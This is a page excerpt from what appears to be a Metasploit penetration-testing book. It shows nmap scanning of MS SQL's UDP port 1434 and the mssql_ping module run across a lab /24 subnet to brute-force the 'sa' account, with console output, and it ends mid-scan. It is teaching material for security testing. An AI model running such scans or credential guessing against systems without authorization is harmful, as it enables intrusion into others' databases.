background image

Meterpreter

77

To begin, we identify the MS SQL installation, and then launch a MS SQL 

Server brute force attack to see if we can guess a password. By default, MS SQL 
is installed on TCP port 1433 and UDP port 1434, though newer versions 
allow for installation on a dynamically allocated port, which can be random-
ized. Luckily, port 1434 UDP (for which we did not scan) remains the same 
and can be queried to identify the dynamic port of the SQL server.

Here, we scan the system and see that MS SQL port 1434 UDP is open:

msf > 

nmap -sU 192.168.33.130 –p1434 

Nmap scan report for 192.168.33.130
Host is up (0.00033s latency).
PORT     STATE         SERVICE
1434/udp open         ms-sql-m 

Nmap done: 1 IP address (1 host up) scanned in 0.46 seconds
msf >

As you can see, we scan our host at   and see that MS SQL UDP port 1434 

at   is open. (Chapters 11, 13, and 17 will cover MS SQL in much more depth.)

When targeting MS SQL, we can leverage the 

mssql_ping

 module to brute 

force the MS SQL port and attempt to guess the username and password. 
When MS SQL is first installed, the program will require the user to create an 

sa

, or system administrator, account. You’ll often be able to guess or brute 

force the 

sa

 account password, because when administrators install this appli-

cation they do not understand the security ramifications of using either a 
blank password or something too simple.

In the next example, we look for the 

mssql_ping 

module and attempt to 

brute force the 

sa

 account:

msf > 

use scanner/mssql/mssql_ping

msf auxiliary(mssql_ping) > 

show options

Module options:

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        The password for the specified username
   RHOSTS                     yes       The target address range or CIDR identifier
   THREADS   1                yes       The number of concurrent threads
   USERNAME  sa               no        The username to authenticate as

msf auxiliary(mssql_ping) > 

set RHOSTS 192.168.33.1/24

RHOSTS => 192.168.33.1/24
msf auxiliary(mssql_ping) > 

set THREADS 20

THREADS => 20
msf auxiliary(mssql_ping) > 

exploit

[*] Scanned 040 of 256 hosts (015% complete)
[*] Scanned 052 of 256 hosts (020% complete)
[*] Scanned 080 of 256 hosts (031% complete)
[*] Scanned 115 of 256 hosts (044% complete)